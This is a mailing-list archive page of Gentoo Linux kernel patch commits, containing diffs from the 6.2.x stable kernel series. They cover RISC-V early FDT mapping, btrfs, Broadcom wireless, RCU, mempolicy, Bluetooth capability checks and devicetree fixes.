+ #define pgd_next_t		pte_t
+ #define alloc_pgd_next(__va)	pt_ops.alloc_pte(__va)
+@@ -636,7 +620,6 @@ static void __init create_p4d_mapping(p4d_t *p4dp,
+ #define create_pgd_next_mapping(__nextp, __va, __pa, __sz, __prot)	\
+ 	create_pte_mapping(__nextp, __va, __pa, __sz, __prot)
+ #define fixmap_pgd_next		((uintptr_t)fixmap_pte)
+-#define early_dtb_pgd_next	((uintptr_t)early_dtb_pmd)
+ #define create_p4d_mapping(__pmdp, __va, __pa, __sz, __prot) do {} while(0)
+ #define create_pud_mapping(__pmdp, __va, __pa, __sz, __prot) do {} while(0)
+ #define create_pmd_mapping(__pmdp, __va, __pa, __sz, __prot) do {} while(0)
+@@ -860,32 +843,28 @@ static void __init create_kernel_page_table(pgd_t *pgdir, bool early)
+  * this means 2 PMD entries whereas for 32-bit kernel, this is only 1 PGDIR
+  * entry.
+  */
+-static void __init create_fdt_early_page_table(pgd_t *pgdir, uintptr_t dtb_pa)
++static void __init create_fdt_early_page_table(pgd_t *pgdir,
++					       uintptr_t fix_fdt_va,
++					       uintptr_t dtb_pa)
+ {
+-#ifndef CONFIG_BUILTIN_DTB
+ 	uintptr_t pa = dtb_pa & ~(PMD_SIZE - 1);
+ 
+-	create_pgd_mapping(early_pg_dir, DTB_EARLY_BASE_VA,
+-			   IS_ENABLED(CONFIG_64BIT) ? early_dtb_pgd_next : pa,
+-			   PGDIR_SIZE,
+-			   IS_ENABLED(CONFIG_64BIT) ? PAGE_TABLE : PAGE_KERNEL);
+-
+-	if (pgtable_l5_enabled)
+-		create_p4d_mapping(early_dtb_p4d, DTB_EARLY_BASE_VA,
+-				   (uintptr_t)early_dtb_pud, P4D_SIZE, PAGE_TABLE);
+-
+-	if (pgtable_l4_enabled)
+-		create_pud_mapping(early_dtb_pud, DTB_EARLY_BASE_VA,
+-				   (uintptr_t)early_dtb_pmd, PUD_SIZE, PAGE_TABLE);
++#ifndef CONFIG_BUILTIN_DTB
++	/* Make sure the fdt fixmap address is always aligned on PMD size */
++	BUILD_BUG_ON(FIX_FDT % (PMD_SIZE / PAGE_SIZE));
+ 
+-	if (IS_ENABLED(CONFIG_64BIT)) {
+-		create_pmd_mapping(early_dtb_pmd, DTB_EARLY_BASE_VA,
++	/* In 32-bit only, the fdt lies in its own PGD */
++	if (!IS_ENABLED(CONFIG_64BIT)) {
++		create_pgd_mapping(early_pg_dir, fix_fdt_va,
++				   pa, MAX_FDT_SIZE, PAGE_KERNEL);
++	} else {
++		create_pmd_mapping(fixmap_pmd, fix_fdt_va,
+ 				   pa, PMD_SIZE, PAGE_KERNEL);
+-		create_pmd_mapping(early_dtb_pmd, DTB_EARLY_BASE_VA + PMD_SIZE,
++		create_pmd_mapping(fixmap_pmd, fix_fdt_va + PMD_SIZE,
+ 				   pa + PMD_SIZE, PMD_SIZE, PAGE_KERNEL);
+ 	}
+ 
+-	dtb_early_va = (void *)DTB_EARLY_BASE_VA + (dtb_pa & (PMD_SIZE - 1));
++	dtb_early_va = (void *)fix_fdt_va + (dtb_pa & (PMD_SIZE - 1));
+ #else
+ 	/*
+ 	 * For 64-bit kernel, __va can't be used since it would return a linear
+@@ -1055,7 +1034,8 @@ asmlinkage void __init setup_vm(uintptr_t dtb_pa)
+ 	create_kernel_page_table(early_pg_dir, true);
+ 
+ 	/* Setup early mapping for FDT early scan */
+-	create_fdt_early_page_table(early_pg_dir, dtb_pa);
++	create_fdt_early_page_table(early_pg_dir,
++				    __fix_to_virt(FIX_FDT), dtb_pa);
+ 
+ 	/*
+ 	 * Bootime fixmap only can handle PMD_SIZE mapping. Thus, boot-ioremap
+@@ -1097,6 +1077,16 @@ static void __init setup_vm_final(void)
+ 	u64 i;
+ 
+ 	/* Setup swapper PGD for fixmap */
++#if !defined(CONFIG_64BIT)
++	/*
++	 * In 32-bit, the device tree lies in a pgd entry, so it must be copied
++	 * directly in swapper_pg_dir in addition to the pgd entry that points
++	 * to fixmap_pte.
++	 */
++	unsigned long idx = pgd_index(__fix_to_virt(FIX_FDT));
++
++	set_pgd(&swapper_pg_dir[idx], early_pg_dir[idx]);
++#endif
+ 	create_pgd_mapping(swapper_pg_dir, FIXADDR_START,
+ 			   __pa_symbol(fixmap_pgd_next),
+ 			   PGDIR_SIZE, PAGE_TABLE);
+diff --git a/arch/x86/Makefile.um b/arch/x86/Makefile.um
+index b3c1ae084180d..1aa64846e5398 100644
+--- a/arch/x86/Makefile.um
++++ b/arch/x86/Makefile.um
+@@ -1,6 +1,17 @@
+ # SPDX-License-Identifier: GPL-2.0
+ core-y += arch/x86/crypto/
+ 
++#
++# Disable SSE and other FP/SIMD instructions to match normal x86
++# This is required to work around issues in older LLVM versions, but breaks
++# GCC versions < 11. See:
++# https://gcc.gnu.org/bugzilla/show_bug.cgi?id=99652
++#
++ifeq ($(CONFIG_CC_IS_CLANG),y)
++KBUILD_CFLAGS += -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx
++KBUILD_RUSTFLAGS += -Ctarget-feature=-sse,-sse2,-sse3,-ssse3,-sse4.1,-sse4.2,-avx,-avx2
++endif
++
+ ifeq ($(CONFIG_X86_32),y)
+ START := 0x8048000
+ 
+diff --git a/drivers/base/dd.c b/drivers/base/dd.c
+index 959fe018d0dd7..488f07314db34 100644
+--- a/drivers/base/dd.c
++++ b/drivers/base/dd.c
+@@ -718,7 +718,12 @@ static int really_probe_debug(struct device *dev, struct device_driver *drv)
+ 	calltime = ktime_get();
+ 	ret = really_probe(dev, drv);
+ 	rettime = ktime_get();
+-	pr_debug("probe of %s returned %d after %lld usecs\n",
++	/*
++	 * Don't change this to pr_debug() because that requires
++	 * CONFIG_DYNAMIC_DEBUG and we want a simple 'initcall_debug' on the
++	 * kernel commandline to print this all the time at the debug level.
++	 */
++	printk(KERN_DEBUG "probe of %s returned %d after %lld usecs\n",
+ 		 dev_name(dev), ret, ktime_us_delta(rettime, calltime));
+ 	return ret;
+ }
+diff --git a/drivers/gpio/gpiolib-acpi.c b/drivers/gpio/gpiolib-acpi.c
+index 7c9175619a1dc..e9c79f76f1b69 100644
+--- a/drivers/gpio/gpiolib-acpi.c
++++ b/drivers/gpio/gpiolib-acpi.c
+@@ -1627,6 +1627,19 @@ static const struct dmi_system_id gpiolib_acpi_quirks[] __initconst = {
+ 			.ignore_interrupt = "AMDI0030:00@18",
+ 		},
+ 	},
++	{
++		/*
++		 * Spurious wakeups from TP_ATTN# pin
++		 * Found in BIOS 1.7.8
++		 * https://gitlab.freedesktop.org/drm/amd/-/issues/1722#note_1720627
++		 */
++		.matches = {
++			DMI_MATCH(DMI_BOARD_NAME, "NL5xNU"),
++		},
++		.driver_data = &(struct acpi_gpiolib_dmi_quirk) {
++			.ignore_wake = "ELAN0415:00@9",
++		},
++	},
+ 	{
+ 		/*
+ 		 * Spurious wakeups from TP_ATTN# pin
+diff --git a/drivers/gpu/drm/drm_fb_helper.c b/drivers/gpu/drm/drm_fb_helper.c
+index 0d0c26ebab906..ecccd01850194 100644
+--- a/drivers/gpu/drm/drm_fb_helper.c
++++ b/drivers/gpu/drm/drm_fb_helper.c
+@@ -1558,6 +1558,9 @@ int drm_fb_helper_check_var(struct fb_var_screeninfo *var,
+ 		return -EINVAL;
+ 	}
+ 
++	var->xres_virtual = fb->width;
++	var->yres_virtual = fb->height;
++
+ 	/*
+ 	 * Workaround for SDL 1.2, which is known to be setting all pixel format
+ 	 * fields values to zero in some cases. We treat this situation as a
+diff --git a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/bcmsdh.c b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/bcmsdh.c
+index 65d4799a56584..ff710b0b5071a 100644
+--- a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/bcmsdh.c
++++ b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/bcmsdh.c
+@@ -965,6 +965,12 @@ out:
+ 		.driver_data = BRCMF_FWVENDOR_ ## fw_vend \
+ 	}
+ 
++#define CYW_SDIO_DEVICE(dev_id, fw_vend) \
++	{ \
++		SDIO_DEVICE(SDIO_VENDOR_ID_CYPRESS, dev_id), \
++		.driver_data = BRCMF_FWVENDOR_ ## fw_vend \
++	}
++
+ /* devices we support, null terminated */
+ static const struct sdio_device_id brcmf_sdmmc_ids[] = {
+ 	BRCMF_SDIO_DEVICE(SDIO_DEVICE_ID_BROADCOM_43143, WCC),
+@@ -979,6 +985,7 @@ static const struct sdio_device_id brcmf_sdmmc_ids[] = {
+ 	BRCMF_SDIO_DEVICE(SDIO_DEVICE_ID_BROADCOM_4335_4339, WCC),
+ 	BRCMF_SDIO_DEVICE(SDIO_DEVICE_ID_BROADCOM_4339, WCC),
+ 	BRCMF_SDIO_DEVICE(SDIO_DEVICE_ID_BROADCOM_43430, WCC),
++	BRCMF_SDIO_DEVICE(SDIO_DEVICE_ID_BROADCOM_43439, WCC),
+ 	BRCMF_SDIO_DEVICE(SDIO_DEVICE_ID_BROADCOM_4345, WCC),
+ 	BRCMF_SDIO_DEVICE(SDIO_DEVICE_ID_BROADCOM_43455, WCC),
+ 	BRCMF_SDIO_DEVICE(SDIO_DEVICE_ID_BROADCOM_4354, WCC),
+@@ -986,9 +993,9 @@ static const struct sdio_device_id brcmf_sdmmc_ids[] = {
+ 	BRCMF_SDIO_DEVICE(SDIO_DEVICE_ID_BROADCOM_4359, WCC),
+ 	BRCMF_SDIO_DEVICE(SDIO_DEVICE_ID_BROADCOM_CYPRESS_4373, CYW),
+ 	BRCMF_SDIO_DEVICE(SDIO_DEVICE_ID_BROADCOM_CYPRESS_43012, CYW),
+-	BRCMF_SDIO_DEVICE(SDIO_DEVICE_ID_BROADCOM_CYPRESS_43439, CYW),
+ 	BRCMF_SDIO_DEVICE(SDIO_DEVICE_ID_BROADCOM_CYPRESS_43752, CYW),
+ 	BRCMF_SDIO_DEVICE(SDIO_DEVICE_ID_BROADCOM_CYPRESS_89359, CYW),
++	CYW_SDIO_DEVICE(SDIO_DEVICE_ID_BROADCOM_CYPRESS_43439, CYW),
+ 	{ /* end: all zeroes */ }
+ };
+ MODULE_DEVICE_TABLE(sdio, brcmf_sdmmc_ids);
+diff --git a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/cfg80211.c b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/cfg80211.c
+index b115902eb475e..b8c99bfce963a 100644
+--- a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/cfg80211.c
++++ b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/cfg80211.c
+@@ -6164,6 +6164,11 @@ static s32 brcmf_get_assoc_ies(struct brcmf_cfg80211_info *cfg,
+ 		(struct brcmf_cfg80211_assoc_ielen_le *)cfg->extra_buf;
+ 	req_len = le32_to_cpu(assoc_info->req_len);
+ 	resp_len = le32_to_cpu(assoc_info->resp_len);
++	if (req_len > WL_EXTRA_BUF_MAX || resp_len > WL_EXTRA_BUF_MAX) {
++		bphy_err(drvr, "invalid lengths in assoc info: req %u resp %u\n",
++			 req_len, resp_len);
++		return -EINVAL;
++	}
+ 	if (req_len) {
+ 		err = brcmf_fil_iovar_data_get(ifp, "assoc_req_ies",
+ 					       cfg->extra_buf,
+diff --git a/drivers/usb/serial/option.c b/drivers/usb/serial/option.c
+index f31cc3c763299..644a55447fd7f 100644
+--- a/drivers/usb/serial/option.c
++++ b/drivers/usb/serial/option.c
+@@ -595,6 +595,11 @@ static void option_instat_callback(struct urb *urb);
+ #define SIERRA_VENDOR_ID			0x1199
+ #define SIERRA_PRODUCT_EM9191			0x90d3
+ 
++/* UNISOC (Spreadtrum) products */
++#define UNISOC_VENDOR_ID			0x1782
++/* TOZED LT70-C based on UNISOC SL8563 uses UNISOC's vendor ID */
++#define TOZED_PRODUCT_LT70C			0x4055
++
+ /* Device flags */
+ 
+ /* Highest interface number which can be used with NCTRL() and RSVD() */
+@@ -2225,6 +2230,7 @@ static const struct usb_device_id option_ids[] = {
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(OPPO_VENDOR_ID, OPPO_PRODUCT_R11, 0xff, 0xff, 0x30) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(SIERRA_VENDOR_ID, SIERRA_PRODUCT_EM9191, 0xff, 0xff, 0x30) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(SIERRA_VENDOR_ID, SIERRA_PRODUCT_EM9191, 0xff, 0, 0) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(UNISOC_VENDOR_ID, TOZED_PRODUCT_LT70C, 0xff, 0, 0) },
+ 	{ } /* Terminating entry */
+ };
+ MODULE_DEVICE_TABLE(usb, option_ids);
+diff --git a/fs/btrfs/send.c b/fs/btrfs/send.c
+index d50182b6deec8..614baded39639 100644
+--- a/fs/btrfs/send.c
++++ b/fs/btrfs/send.c
+@@ -1892,7 +1892,7 @@ static int get_cur_inode_state(struct send_ctx *sctx, u64 ino, u64 gen)
+ 	int left_ret;
+ 	int right_ret;
+ 	u64 left_gen;
+-	u64 right_gen;
++	u64 right_gen = 0;
+ 	struct btrfs_inode_info info;
+ 
+ 	ret = get_inode_info(sctx->send_root, ino, &info);
+diff --git a/fs/btrfs/volumes.c b/fs/btrfs/volumes.c
+index fe652f8fc697b..3f65e37dbd6a5 100644
+--- a/fs/btrfs/volumes.c
++++ b/fs/btrfs/volumes.c
+@@ -2618,7 +2618,7 @@ int btrfs_init_new_device(struct btrfs_fs_info *fs_info, const char *device_path
+ 	struct block_device *bdev;
+ 	struct super_block *sb = fs_info->sb;
+ 	struct btrfs_fs_devices *fs_devices = fs_info->fs_devices;
+-	struct btrfs_fs_devices *seed_devices;
++	struct btrfs_fs_devices *seed_devices = NULL;
+ 	u64 orig_super_total_bytes;
+ 	u64 orig_super_num_devices;
+ 	int ret = 0;
+diff --git a/include/linux/mmc/sdio_ids.h b/include/linux/mmc/sdio_ids.h
+index 74f9d9a6d3307..f0cf9c5d6502a 100644
+--- a/include/linux/mmc/sdio_ids.h
++++ b/include/linux/mmc/sdio_ids.h
+@@ -74,10 +74,13 @@
+ #define SDIO_DEVICE_ID_BROADCOM_43362		0xa962
+ #define SDIO_DEVICE_ID_BROADCOM_43364		0xa9a4
+ #define SDIO_DEVICE_ID_BROADCOM_43430		0xa9a6
+-#define SDIO_DEVICE_ID_BROADCOM_CYPRESS_43439	0xa9af
++#define SDIO_DEVICE_ID_BROADCOM_43439		0xa9af
+ #define SDIO_DEVICE_ID_BROADCOM_43455		0xa9bf
+ #define SDIO_DEVICE_ID_BROADCOM_CYPRESS_43752	0xaae8
+ 
++#define SDIO_VENDOR_ID_CYPRESS			0x04b4
++#define SDIO_DEVICE_ID_BROADCOM_CYPRESS_43439	0xbd3d
++
+ #define SDIO_VENDOR_ID_MARVELL			0x02df
+ #define SDIO_DEVICE_ID_MARVELL_LIBERTAS		0x9103
+ #define SDIO_DEVICE_ID_MARVELL_8688_WLAN	0x9104
+diff --git a/kernel/rcu/tree.c b/kernel/rcu/tree.c
+index cf34a961821ad..5221291937713 100644
+--- a/kernel/rcu/tree.c
++++ b/kernel/rcu/tree.c
+@@ -3131,6 +3131,18 @@ need_offload_krc(struct kfree_rcu_cpu *krcp)
+ 	return !!krcp->head;
+ }
+ 
++static bool
++need_wait_for_krwp_work(struct kfree_rcu_cpu_work *krwp)
++{
++	int i;
++
++	for (i = 0; i < FREE_N_CHANNELS; i++)
++		if (krwp->bkvhead_free[i])
++			return true;
++
++	return !!krwp->head_free;
++}
++
+ static void
+ schedule_delayed_monitor_work(struct kfree_rcu_cpu *krcp)
+ {
+@@ -3162,14 +3174,13 @@ static void kfree_rcu_monitor(struct work_struct *work)
+ 	for (i = 0; i < KFREE_N_BATCHES; i++) {
+ 		struct kfree_rcu_cpu_work *krwp = &(krcp->krw_arr[i]);
+ 
+-		// Try to detach bkvhead or head and attach it over any
+-		// available corresponding free channel. It can be that
+-		// a previous RCU batch is in progress, it means that
+-		// immediately to queue another one is not possible so
+-		// in that case the monitor work is rearmed.
+-		if ((krcp->bkvhead[0] && !krwp->bkvhead_free[0]) ||
+-			(krcp->bkvhead[1] && !krwp->bkvhead_free[1]) ||
+-				(krcp->head && !krwp->head_free)) {
++		// Try to detach bulk_head or head and attach it, only when
++		// all channels are free.  Any channel is not free means at krwp
++		// there is on-going rcu work to handle krwp's free business.
++		if (need_wait_for_krwp_work(krwp))
++			continue;
++
++		if (need_offload_krc(krcp)) {
+ 			// Channel 1 corresponds to the SLAB-pointer bulk path.
+ 			// Channel 2 corresponds to vmalloc-pointer bulk path.
+ 			for (j = 0; j < FREE_N_CHANNELS; j++) {
+diff --git a/mm/mempolicy.c b/mm/mempolicy.c
+index f940395667c82..e132f70a059e8 100644
+--- a/mm/mempolicy.c
++++ b/mm/mempolicy.c
+@@ -784,70 +784,56 @@ static int vma_replace_policy(struct vm_area_struct *vma,
+ 	return err;
+ }
+ 
+-/* Step 2: apply policy to a range and do splits. */
+-static int mbind_range(struct mm_struct *mm, unsigned long start,
+-		       unsigned long end, struct mempolicy *new_pol)
++/* Split or merge the VMA (if required) and apply the new policy */
++static int mbind_range(struct vma_iterator *vmi, struct vm_area_struct *vma,
++		struct vm_area_struct **prev, unsigned long start,
++		unsigned long end, struct mempolicy *new_pol)
+ {
+-	MA_STATE(mas, &mm->mm_mt, start, start);
+-	struct vm_area_struct *prev;
+-	struct vm_area_struct *vma;
+-	int err = 0;
++	struct vm_area_struct *merged;
++	unsigned long vmstart, vmend;
+ 	pgoff_t pgoff;
++	int err;
+ 
+-	prev = mas_prev(&mas, 0);
+-	if (unlikely(!prev))
+-		mas_set(&mas, start);
++	vmend = min(end, vma->vm_end);
++	if (start > vma->vm_start) {
++		*prev = vma;
++		vmstart = start;
++	} else {
++		vmstart = vma->vm_start;
++	}
+ 
+-	vma = mas_find(&mas, end - 1);
+-	if (WARN_ON(!vma))
++	if (mpol_equal(vma_policy(vma), new_pol))
+ 		return 0;
+ 
+-	if (start > vma->vm_start)
+-		prev = vma;
+-
+-	for (; vma; vma = mas_next(&mas, end - 1)) {
+-		unsigned long vmstart = max(start, vma->vm_start);
+-		unsigned long vmend = min(end, vma->vm_end);
+-
+-		if (mpol_equal(vma_policy(vma), new_pol))
+-			goto next;
+-
+-		pgoff = vma->vm_pgoff +
+-			((vmstart - vma->vm_start) >> PAGE_SHIFT);
+-		prev = vma_merge(mm, prev, vmstart, vmend, vma->vm_flags,
+-				 vma->anon_vma, vma->vm_file, pgoff,
+-				 new_pol, vma->vm_userfaultfd_ctx,
+-				 anon_vma_name(vma));
+-		if (prev) {
+-			/* vma_merge() invalidated the mas */
+-			mas_pause(&mas);
+-			vma = prev;
+-			goto replace;
+-		}
+-		if (vma->vm_start != vmstart) {
+-			err = split_vma(vma->vm_mm, vma, vmstart, 1);
+-			if (err)
+-				goto out;
+-			/* split_vma() invalidated the mas */
+-			mas_pause(&mas);
+-		}
+-		if (vma->vm_end != vmend) {
+-			err = split_vma(vma->vm_mm, vma, vmend, 0);
+-			if (err)
+-				goto out;
+-			/* split_vma() invalidated the mas */
+-			mas_pause(&mas);
+-		}
+-replace:
+-		err = vma_replace_policy(vma, new_pol);
++	pgoff = vma->vm_pgoff + ((vmstart - vma->vm_start) >> PAGE_SHIFT);
++	merged = vma_merge(vma->vm_mm, *prev, vmstart, vmend, vma->vm_flags,
++			   vma->anon_vma, vma->vm_file, pgoff, new_pol,
++			   vma->vm_userfaultfd_ctx, anon_vma_name(vma));
++	if (merged) {
++		*prev = merged;
++		/* vma_merge() invalidated the mas */
++		mas_pause(&vmi->mas);
++		return vma_replace_policy(merged, new_pol);
++	}
++
++	if (vma->vm_start != vmstart) {
++		err = split_vma(vma->vm_mm, vma, vmstart, 1);
+ 		if (err)
+-			goto out;
+-next:
+-		prev = vma;
++			return err;
++		/* split_vma() invalidated the mas */
++		mas_pause(&vmi->mas);
+ 	}
+ 
+-out:
+-	return err;
++	if (vma->vm_end != vmend) {
++		err = split_vma(vma->vm_mm, vma, vmend, 0);
++		if (err)
++			return err;
++		/* split_vma() invalidated the mas */
++		mas_pause(&vmi->mas);
++	}
++
++	*prev = vma;
++	return vma_replace_policy(vma, new_pol);
+ }
+ 
+ /* Set the process memory policy */
+@@ -1259,6 +1245,8 @@ static long do_mbind(unsigned long start, unsigned long len,
+ 		     nodemask_t *nmask, unsigned long flags)
+ {
+ 	struct mm_struct *mm = current->mm;
++	struct vm_area_struct *vma, *prev;
++	struct vma_iterator vmi;
+ 	struct mempolicy *new;
+ 	unsigned long end;
+ 	int err;
+@@ -1328,7 +1316,13 @@ static long do_mbind(unsigned long start, unsigned long len,
+ 		goto up_out;
+ 	}
+ 
+-	err = mbind_range(mm, start, end, new);
++	vma_iter_init(&vmi, mm, start);
++	prev = vma_prev(&vmi);
++	for_each_vma_range(vmi, vma, end) {
++		err = mbind_range(&vmi, vma, &prev, start, end, new);
++		if (err)
++			break;
++	}
+ 
+ 	if (!err) {
+ 		int nr_failed = 0;
+@@ -1489,10 +1483,8 @@ SYSCALL_DEFINE4(set_mempolicy_home_node, unsigned long, start, unsigned long, le
+ 		unsigned long, home_node, unsigned long, flags)
+ {
+ 	struct mm_struct *mm = current->mm;
+-	struct vm_area_struct *vma;
++	struct vm_area_struct *vma, *prev;
+ 	struct mempolicy *new;
+-	unsigned long vmstart;
+-	unsigned long vmend;
+ 	unsigned long end;
+ 	int err = -ENOENT;
+ 	VMA_ITERATOR(vmi, mm, start);
+@@ -1521,9 +1513,8 @@ SYSCALL_DEFINE4(set_mempolicy_home_node, unsigned long, start, unsigned long, le
+ 	if (end == start)
+ 		return 0;
+ 	mmap_write_lock(mm);
++	prev = vma_prev(&vmi);
+ 	for_each_vma_range(vmi, vma, end) {
+-		vmstart = max(start, vma->vm_start);
+-		vmend   = min(end, vma->vm_end);
+ 		new = mpol_dup(vma_policy(vma));
+ 		if (IS_ERR(new)) {
+ 			err = PTR_ERR(new);
+@@ -1547,7 +1538,7 @@ SYSCALL_DEFINE4(set_mempolicy_home_node, unsigned long, start, unsigned long, le
+ 		}
+ 
+ 		new->home_node = home_node;
+-		err = mbind_range(mm, vmstart, vmend, new);
++		err = mbind_range(&vmi, vma, &prev, start, end, new);
+ 		mpol_put(new);
+ 		if (err)
+ 			break;
+diff --git a/net/bluetooth/hci_sock.c b/net/bluetooth/hci_sock.c
+index 06581223238c5..f597fe0db9f8f 100644
+--- a/net/bluetooth/hci_sock.c
++++ b/net/bluetooth/hci_sock.c
+@@ -1003,7 +1003,14 @@ static int hci_sock_ioctl(struct socket *sock, unsigned int cmd,
+ 	if (hci_sock_gen_cookie(sk)) {
+ 		struct sk_buff *skb;
+ 
+-		if (capable(CAP_NET_ADMIN))
++		/* Perform careful checks before setting the HCI_SOCK_TRUSTED
++		 * flag. Make sure that not only the current task but also
++		 * the socket opener has the required capability, since
++		 * privileged programs can be tricked into making ioctl calls
++		 * on HCI sockets, and the socket should not be marked as
++		 * trusted simply because the ioctl caller is privileged.
++		 */
++		if (sk_capable(sk, CAP_NET_ADMIN))
+ 			hci_sock_set_flag(sk, HCI_SOCK_TRUSTED);
+ 
+ 		/* Send event to monitor */


^ permalink raw reply related	[flat|nested] 30+ messages in thread
* [gentoo-commits] proj/linux-patches:6.2 commit in: /
@ 2023-04-26 13:21 Mike Pagano
  0 siblings, 0 replies; 30+ messages in thread
From: Mike Pagano @ 2023-04-26 13:21 UTC (permalink / raw
  To: gentoo-commits

commit:     c42d70276b33abe1ce8f83d8422b7676bdf0480e
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Wed Apr 26 13:21:21 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Wed Apr 26 13:21:21 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=c42d7027

Linuxpatch 6.2.13

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |    4 +
 1012_linux-6.2.13.patch | 3619 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 3623 insertions(+)

diff --git a/0000_README b/0000_README
index 3bd4fbeb..bb52a583 100644
--- a/0000_README
+++ b/0000_README
@@ -91,6 +91,10 @@ Patch:  1011_linux-6.2.12.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.2.12
 
+Patch:  1012_linux-6.2.13.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.2.13
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1012_linux-6.2.13.patch b/1012_linux-6.2.13.patch
new file mode 100644
index 00000000..10b101ec
--- /dev/null
+++ b/1012_linux-6.2.13.patch
@@ -0,0 +1,3619 @@
+diff --git a/Documentation/admin-guide/kernel-parameters.rst b/Documentation/admin-guide/kernel-parameters.rst
+index 959f73a327126..426440f5d79f2 100644
+--- a/Documentation/admin-guide/kernel-parameters.rst
++++ b/Documentation/admin-guide/kernel-parameters.rst
+@@ -128,6 +128,7 @@ parameter is applicable::
+ 	KVM	Kernel Virtual Machine support is enabled.
+ 	LIBATA  Libata driver is enabled
+ 	LP	Printer support is enabled.
++	LOONGARCH LoongArch architecture is enabled.
+ 	LOOP	Loopback device support is enabled.
+ 	M68k	M68k architecture is enabled.
+ 			These options have more detailed description inside of
+diff --git a/Documentation/admin-guide/kernel-parameters.txt b/Documentation/admin-guide/kernel-parameters.txt
+index 6cfa6e3996cf7..8cf1595545ac2 100644
+--- a/Documentation/admin-guide/kernel-parameters.txt
++++ b/Documentation/admin-guide/kernel-parameters.txt
+@@ -6874,6 +6874,12 @@
+ 			When enabled, memory and cache locality will be
+ 			impacted.
+ 
++	writecombine=	[LOONGARCH] Control the MAT (Memory Access Type) of
++			ioremap_wc().
++
++			on   - Enable writecombine, use WUC for ioremap_wc()
++			off  - Disable writecombine, use SUC for ioremap_wc()
++
+ 	x2apic_phys	[X86-64,APIC] Use x2apic physical mode instead of
+ 			default x2apic cluster mode on platforms
+ 			supporting x2apic.
+diff --git a/Makefile b/Makefile
+index 068374cc26018..f76a4a63aaf5a 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 2
+-SUBLEVEL = 12
++SUBLEVEL = 13
+ EXTRAVERSION =
+ NAME = Hurr durr I'ma ninja sloth
+ 
+diff --git a/arch/arm/boot/dts/rk3288.dtsi b/arch/arm/boot/dts/rk3288.dtsi
+index 2ca76b69add78..511ca864c1b2d 100644
+--- a/arch/arm/boot/dts/rk3288.dtsi
++++ b/arch/arm/boot/dts/rk3288.dtsi
+@@ -942,7 +942,7 @@
+ 		status = "disabled";
+ 	};
+ 
+-	spdif: sound@ff88b0000 {
++	spdif: sound@ff8b0000 {
+ 		compatible = "rockchip,rk3288-spdif", "rockchip,rk3066-spdif";
+ 		reg = <0x0 0xff8b0000 0x0 0x10000>;
+ 		#sound-dai-cells = <0>;
+diff --git a/arch/arm64/boot/dts/amlogic/meson-g12-common.dtsi b/arch/arm64/boot/dts/amlogic/meson-g12-common.dtsi
+index c063a144e0e7b..42027c78c8ded 100644
+--- a/arch/arm64/boot/dts/amlogic/meson-g12-common.dtsi
++++ b/arch/arm64/boot/dts/amlogic/meson-g12-common.dtsi
+@@ -1571,15 +1571,20 @@
+ 
+ 			dmc: bus@38000 {
+ 				compatible = "simple-bus";
+-				reg = <0x0 0x38000 0x0 0x400>;
+ 				#address-cells = <2>;
+ 				#size-cells = <2>;
+-				ranges = <0x0 0x0 0x0 0x38000 0x0 0x400>;
++				ranges = <0x0 0x0 0x0 0x38000 0x0 0x2000>;
+ 
+ 				canvas: video-lut@48 {
+ 					compatible = "amlogic,canvas";
+ 					reg = <0x0 0x48 0x0 0x14>;
+ 				};
++
++				pmu: pmu@80 {
++					reg = <0x0 0x80 0x0 0x40>,
++					      <0x0 0xc00 0x0 0x40>;
++					interrupts = <GIC_SPI 52 IRQ_TYPE_EDGE_RISING>;
++				};
+ 			};
+ 
+ 			usb2_phy1: phy@3a000 {
+@@ -1705,12 +1710,6 @@
+ 			};
+ 		};
+ 
+-		pmu: pmu@ff638000 {
+-			reg = <0x0 0xff638000 0x0 0x100>,
+-			      <0x0 0xff638c00 0x0 0x100>;
+-			interrupts = <GIC_SPI 52 IRQ_TYPE_EDGE_RISING>;
+-		};
+-
+ 		aobus: bus@ff800000 {
+ 			compatible = "simple-bus";
+ 			reg = <0x0 0xff800000 0x0 0x100000>;
+diff --git a/arch/arm64/boot/dts/freescale/imx8mm-evk.dtsi b/arch/arm64/boot/dts/freescale/imx8mm-evk.dtsi
+index e0b604ac0da4f..85661825b8386 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mm-evk.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8mm-evk.dtsi
+@@ -194,7 +194,7 @@
+ 		rohm,reset-snvs-powered;
+ 
+ 		#clock-cells = <0>;
+-		clocks = <&osc_32k 0>;
++		clocks = <&osc_32k>;
+ 		clock-output-names = "clk-32k-out";
+ 
+ 		regulators {
+diff --git a/arch/arm64/boot/dts/freescale/imx8mm-verdin.dtsi b/arch/arm64/boot/dts/freescale/imx8mm-verdin.dtsi
+index 702d87621bb43..1381b9ce3d5ee 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mm-verdin.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8mm-verdin.dtsi
+@@ -95,7 +95,7 @@
+ 		compatible = "regulator-fixed";
+ 		enable-active-high;
+ 		gpio = <&gpio2 20 GPIO_ACTIVE_HIGH>; /* PMIC_EN_ETH */
+-		off-on-delay = <500000>;
